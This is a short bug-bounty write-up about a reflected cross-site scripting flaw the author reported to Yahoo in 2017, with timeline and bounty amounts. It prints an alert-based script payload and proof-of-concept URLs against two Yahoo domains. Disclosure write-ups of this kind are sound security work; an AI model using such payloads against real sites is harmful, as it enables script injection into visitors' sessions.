Reflected XSS in Yahoo!
Shahzada Al Shahriar Khan Thursday, August 31, 2017 Bug Bounty Cross-Site Scripting Ethical Hacking Hackerone Reflected XSS in Yahoo XSS In Yahoo
Hello Guys, This is Shahzada Al Shahriar Khan. Known as TheShahzada.
I am from Bangladesh. And I am Newbie in Bug Bounty. :P
Well, Now I will share how I found Reflected Cross-Site Scripting (XSS) in main & sub domain of Yahoo.
Vulnerable URL:
1. https://www.yahoo.com/movies/film/[*]
2. https://ca.yahoo.com/movies/film/[*]
Payload I Use:
“><%2fscript><script>alert(document.domain)<%2fscript>
PoC URL:
1. https://www.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
2. https://ca.yahoo.com/movies/film/"><%2fscript><script>alert(document.domain)<%2fscript>
PoC:
Yahoo Canada Subdomain
Video PoC:
Timeline: Aug 12th — I Submitted The Report. Aug 15th — Triaged The Report & Rewarded Me $300 Initial Bounty. Aug 16th — Resolved Aug 24th — $400 Bounty Rewarded.
Originally published at blog.theshahzada.com on August 31, 2017.